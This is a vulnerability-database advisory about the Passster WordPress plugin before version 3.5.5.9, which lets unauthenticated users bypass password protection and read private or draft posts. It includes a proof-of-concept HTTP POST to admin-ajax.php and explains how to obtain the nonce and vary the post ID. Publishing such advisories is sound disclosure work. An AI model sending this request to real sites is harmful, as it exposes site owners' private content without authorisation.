Lucene search

K
wpvulndbDc11WPVDB-ID:0967303D-EA49-4993-84EB-A7EC97240071
HistoryDec 29, 2022 - 12:00 a.m.

Passster < 3.5.5.9 - Protection Bypass & Arbitrary Post Access

2022-12-2900:00:00
dc11
wpscan.com
11
passster plugin
vulnerability
protection bypass
arbitrary post access
unauthenticated users
crafted request
admin-ajax.php

EPSS

0.002

Percentile

62.4%

The plugin does not properly check for password, as well as that the post to be viewed is public, allowing unauthenticated users to bypass the protection offered by the plugin, and access arbitrary posts (such as private) content, by sending a specifically crafted request.

PoC

The nonce can be retrieved from a post protected by the plugin (look for ps_ajax). 1260 is the ID of a post protected by the plugin and a password. Arbitrary posts (such as private/draft) can also be accessed the same way, just by changing the post_id parameter) POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 91 action=validate_input&nonce;=a14db14dbd&captcha;=a&post;_id=1260&type;=captcha&protection;=full

EPSS

0.002

Percentile

62.4%

Related for WPVDB-ID:0967303D-EA49-4993-84EB-A7EC97240071